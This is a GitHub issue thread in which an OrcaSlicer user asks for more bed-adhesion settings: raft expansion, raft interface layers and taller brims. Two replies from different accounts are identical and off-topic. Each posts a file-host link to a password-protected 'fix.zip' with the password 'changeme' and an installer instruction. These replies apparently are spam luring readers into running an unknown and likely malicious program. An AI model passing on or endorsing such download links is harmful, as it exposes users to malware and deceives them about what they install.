OrcaSlicer/OrcaSlicer #6566: Raft and Brim : Some options are sorely lacking

ValCT, 2024-08-26:
### Is there an existing issue for this feature request?

- [X] I have searched the existing issues

### Is your feature request related to a problem?

In it's present state, Orcaslicer doesn't allow to print certain kind of models due to insufficient configurability of bed adhesion enhancement features (typically, models that expand in size as Z grows).
Here are pics of a model that is never going to stick at the bed despite enabling Raft, Brim or even Skirt.
[image]
[image]
[image]

### Which printers will be beneficial to this feature?

All

### Describe the solution you'd like

I suggest adding the following options :

- Raft : Expansion option (so that it can reflect the model real size when only a small surface of it is in contact with the bed)
- Raft : Number of layers for bed interface (helps a lot to fight against shrinking in my experience)

- Brim : Brim height (Not to be limited to one layer height. I used to use brims as high as 2 mm to ensure adhesion of some tricky parts) 

### Describe alternatives you've considered

Drawing the adhesion features at the CAD stage, but it is impacting workflow.

seeronline, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

WSA1k, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

ValCT, 2024-09-07:
Today's work : Here is the perfect example of a part that wouldn't be printable with OrcaSlicer witout designing a custom adhesion solution.
[image]

closed 2024-12-15 by github-actions[bot]